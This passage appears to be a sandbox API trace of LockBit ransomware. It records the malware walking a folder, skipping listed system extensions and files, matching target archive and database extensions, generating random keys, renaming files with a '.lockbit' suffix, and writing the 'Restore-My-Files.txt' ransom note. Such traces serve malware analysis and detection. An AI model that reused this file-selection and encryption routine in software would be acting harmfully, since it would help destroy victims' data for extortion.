Office\\CLIPART\\PUB60COR\\BD06200_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0105.343] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0105.343] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0105.343] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5f455930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x687c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD07761_.WMF", cAlternateFileName="")) returned 1 [0105.343] lstrcmpiW (lpString1=".", lpString2="BD07761_.WMF") returned -1 [0105.343] lstrcmpiW (lpString1="..", lpString2="BD07761_.WMF") returned -1 [0105.343] PathFindExtensionW (pszPath="BD07761_.WMF") returned=".WMF" [0105.343] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0105.343] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0105.343] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0105.343] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0105.343] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0105.343] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0105.343] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0105.343] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0105.343] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0105.343] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0105.343] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0105.343] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0105.343] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0105.343] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0105.343] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0105.343] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0105.343] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0105.343] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0105.343] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0105.344] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0105.344] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0105.344] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0105.344] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0105.344] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0105.344] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0105.344] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0105.344] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0105.344] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0105.344] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0105.344] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0105.344] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0105.344] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0105.344] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0105.344] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0105.344] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0105.344] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0105.344] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0105.344] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0105.344] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0105.344] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0105.344] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0105.344] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0105.344] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0105.344] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0105.344] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0105.344] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0105.344] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0105.344] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD07761_.WMF") returned 1 [0105.344] lstrcmpiW (lpString1="ntldr", lpString2="BD07761_.WMF") returned 1 [0105.344] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD07761_.WMF") returned 1 [0105.344] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD07761_.WMF") returned 1 [0105.344] lstrcmpiW (lpString1="autorun.inf", lpString2="BD07761_.WMF") returned -1 [0105.345] lstrcmpiW (lpString1="thumbs.db", lpString2="BD07761_.WMF") returned 1 [0105.345] lstrcmpiW (lpString1="iconcache.db", lpString2="BD07761_.WMF") returned 1 [0105.345] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0105.345] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned=".WMF" [0105.345] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0105.345] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0105.345] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0105.345] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0105.345] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0105.345] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0105.345] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0105.345] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0105.345] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0105.345] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0105.345] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0105.345] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0105.345] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0105.345] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0105.345] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0105.345] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0105.345] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0105.345] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0105.345] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0105.345] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0105.345] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0105.345] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0105.345] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0105.345] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0105.345] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0105.345] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0105.345] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0105.345] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0105.346] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF.lockbit") returned 72 [0105.346] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07761_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0105.346] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0105.346] malloc (_Size=0x40068) returned 0x1ff1e60 [0105.346] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=26748) returned 1 [0105.346] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0105.347] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0105.347] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0105.347] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0105.347] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0105.347] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0105.347] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0105.427] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0105.427] malloc (_Size=0xa6) returned 0x77d800 [0105.427] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0105.578] free (_Block=0x77d800) [0105.578] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0105.578] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0105.578] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0105.579] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5f455930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x133c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD07804_.WMF", cAlternateFileName="")) returned 1 [0105.579] lstrcmpiW (lpString1=".", lpString2="BD07804_.WMF") returned -1 [0105.579] lstrcmpiW (lpString1="..", lpString2="BD07804_.WMF") returned -1 [0105.579] PathFindExtensionW (pszPath="BD07804_.WMF") returned=".WMF" [0105.579] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0105.579] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0105.579] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0105.579] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0105.579] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0105.579] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0105.579] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0105.579] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0105.579] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0105.579] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0105.579] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0105.579] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0105.579] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0105.579] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0105.579] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0105.579] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0105.579] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0105.579] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0105.579] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0105.580] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0105.580] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0105.580] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0105.580] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0105.580] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0105.580] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0105.580] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0105.580] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0105.580] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0105.580] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0105.580] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0105.580] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0105.580] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0105.580] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0105.580] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0105.580] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0105.580] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0105.580] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0105.580] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0105.580] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0105.580] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0105.580] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0105.580] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0105.580] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0105.580] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0105.580] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0105.581] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0105.581] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0105.581] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD07804_.WMF") returned 1 [0105.581] lstrcmpiW (lpString1="ntldr", lpString2="BD07804_.WMF") returned 1 [0105.581] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD07804_.WMF") returned 1 [0105.581] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD07804_.WMF") returned 1 [0105.581] lstrcmpiW (lpString1="autorun.inf", lpString2="BD07804_.WMF") returned -1 [0105.581] lstrcmpiW (lpString1="thumbs.db", lpString2="BD07804_.WMF") returned 1 [0105.581] lstrcmpiW (lpString1="iconcache.db", lpString2="BD07804_.WMF") returned 1 [0105.581] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0105.581] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned=".WMF" [0105.581] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0105.581] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0105.581] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0105.581] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0105.581] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0105.581] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0105.581] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0105.581] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0105.581] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0105.581] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0105.581] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0105.581] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0105.581] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0105.581] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0105.581] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0105.582] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0105.582] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0105.582] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0105.582] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0105.582] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0105.582] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0105.582] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0105.582] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0105.582] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0105.582] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0105.582] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0105.582] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0105.582] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0105.582] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF.lockbit") returned 72 [0105.582] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07804_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0105.583] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0105.583] malloc (_Size=0x40068) returned 0x1ff1e60 [0105.583] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=4924) returned 1 [0105.583] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0105.583] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0105.583] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0105.584] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0105.584] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0105.584] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0105.584] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0105.600] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0105.601] malloc (_Size=0xa6) returned 0x77d800 [0105.601] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0105.616] free (_Block=0x77d800) [0105.616] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0105.616] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0105.616] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0105.616] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5f455930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xfe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD07831_.WMF", cAlternateFileName="")) returned 1 [0105.617] lstrcmpiW (lpString1=".", lpString2="BD07831_.WMF") returned -1 [0105.617] lstrcmpiW (lpString1="..", lpString2="BD07831_.WMF") returned -1 [0105.617] PathFindExtensionW (pszPath="BD07831_.WMF") returned=".WMF" [0105.617] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0105.617] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0105.617] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0105.617] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0105.617] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0105.617] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0105.617] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0105.617] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0105.617] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0105.617] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0105.617] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0105.617] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0105.617] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0105.617] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0105.617] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0105.617] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0105.617] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0105.617] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0105.617] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0105.617] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0105.617] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0105.617] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0105.617] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0105.618] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0105.618] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0105.618] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0105.618] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0105.618] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0105.618] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0105.618] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0105.618] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0105.618] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0105.618] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0105.618] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0105.618] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0105.618] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0105.618] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0105.618] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0105.618] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0105.618] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0105.618] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0105.618] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0105.618] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0105.618] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0105.619] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0105.619] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0105.619] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0105.619] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD07831_.WMF") returned 1 [0105.619] lstrcmpiW (lpString1="ntldr", lpString2="BD07831_.WMF") returned 1 [0105.619] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD07831_.WMF") returned 1 [0105.619] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD07831_.WMF") returned 1 [0105.619] lstrcmpiW (lpString1="autorun.inf", lpString2="BD07831_.WMF") returned -1 [0105.619] lstrcmpiW (lpString1="thumbs.db", lpString2="BD07831_.WMF") returned 1 [0105.619] lstrcmpiW (lpString1="iconcache.db", lpString2="BD07831_.WMF") returned 1 [0105.619] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0105.619] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned=".WMF" [0105.619] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0105.619] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0105.619] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0105.619] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0105.619] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0105.619] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0105.619] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0105.619] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0105.619] lstrcmpiW (lpString1=".db3", 